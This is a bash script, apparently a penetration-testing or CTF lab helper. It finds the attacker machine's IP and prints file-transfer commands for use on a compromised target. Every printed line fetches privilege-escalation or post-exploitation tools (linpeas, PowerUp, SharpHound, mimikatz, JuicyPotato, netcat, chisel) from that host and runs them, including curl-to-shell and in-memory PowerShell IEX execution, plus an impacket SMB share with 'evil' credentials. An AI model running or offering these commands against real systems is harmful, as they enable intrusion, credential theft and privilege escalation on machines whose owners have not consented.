#!/bin/bash

# display file transfer commands for priv-esc
# Apache2 server (port 80) is used by default

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

port=$1
ip=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1) 2>/dev/null

# if [ "$port" == "" ]; then
# 	port=6666 # default port
# fi

if [ "$ip" == "" ]; then
	ip=$(/sbin/ip -o -4 addr list eth0 | awk '{print $4}' | cut -d/ -f1)
fi

echo -e "${Frame}###${End} http://$ip ${Frame}###${End}\n"

echo -e "${Frame}###${End} ${Title}Linux Local Enum Scripts${End} ${Frame}###${End}"
echo -e "${Point} curl http://$ip/linpeas.sh | sh"
echo -e "    wget http://$ip/linpeas.sh -O /tmp/linpeas.sh; chmod +x /tmp/linpeas.sh"
echo -e "${Point} curl http://$ip/LinEnum.sh | sh"
echo -e "    wget http://$ip/LinEnum.sh -O /tmp/LinEnum.sh; chmod +x /tmp/LinEnum.sh"
echo -e "${Point} curl http://$ip/deepce.sh | sh"
echo -e "    wget http://$ip/deepce.sh -O /tmp/deepce.sh; chmod +x /tmp/deepce.sh"
echo -e ""


echo -e "${Frame}###${End} ${Title}Linux Local Enum Binaries${End} ${Frame}###${End}"
echo -e "${Point} wget http://$ip/pspy32 -O /tmp/pspy32; chmod +x /tmp/pspy32"
echo -e "${Point} wget http://$ip/pspy64 -O /tmp/pspy64; chmod +x /tmp/pspy64"
echo -e ""


echo -e "${Frame}###${End} ${Title}Windows Local Enum Scripts${End} ${Frame}###${End}"
echo -e "${Point} Powershell \"IEX (New-Object Net.WebClient).Downloadstring('http://$ip/jaws-enum.ps1');\" ${Comment}# run on memory${End}"
echo -e "${Point} Powershell \"IEX (New-Object Net.WebClient).Downloadstring('http://$ip/Sherlock.ps1'); Find-AllVulns;\" ${Comment}# run on memory${End}"
echo -e "${Point} Powershell \"IEX (New-Object Net.WebClient).Downloadstring('http://$ip/PowerUp.ps1'); Invoke-Allchecks;\" ${Comment}# run on memory${End}"
echo -e "${Point} Powershell \"IEX (New-Object Net.WebClient).Downloadstring('http://$ip/SharpHound.ps1'); Invoke-BloodHound -CollectAll\" ${Comment}# run on memory${End}"
echo -e ""


echo -e "${Frame}###${End} ${Title}Windows Binaries${End} ${Frame}###${End}"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/wget.exe','C:\\\Users\\\Public\\\Documents\\\wget.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/nc.exe','C:\\\Users\\\Public\\\Documents\\\nc.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/nc.exe','C:\\\Users\\\Public\\\Documents\\\nc64.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/whoami.exe','C:\\\Users\\\Public\\\Documents\\\whoami.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/accesschk.exe','C:\\\Users\\\Public\\\Documents\\\accesschk.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/chisel_windows_amd64.exe','C:\\\Users\\\Public\\\Documents\\\chisel_windows_amd64.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/winPEASany.exe','C:\\\Users\\\Public\\\Documents\\\winPEAS.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/mimikatz32.exe','C:\\\Users\\\Public\\\Documents\\\mimikatz32.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/mimikatz64.exe','C:\\\Users\\\Public\\\Documents\\\mimikatz64.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/JuicyPotato32.exe','C:\\\Users\\\Public\\\Documents\\\JuicyPotato32.exe')"
echo -e "${Point} Powershell (New-Object System.Net.WebClient).DownloadFile('http://$ip/JuicyPotato64.exe','C:\\\Users\\\Public\\\Documents\\\JuicyPotato64.exe')"
echo -e ""


echo -e "${Frame}###${End} ${Title}Transfer Through SMB Server${End} ${Frame}###${End}"
echo -e "${Point} impacket-smbserver share . -username evil -password evil -smb2support"
echo -e "    net use * \\\\\\$ip\share /u:evil evil"
echo -e "    copy Z:\\\kali_to_target.exe"
echo -e "    copy target_to_kali.txt Z:\\"
echo -e "    \\\\\\10.10.14.23\\\share\\\file.exe ${Comment}# run executable${End}"


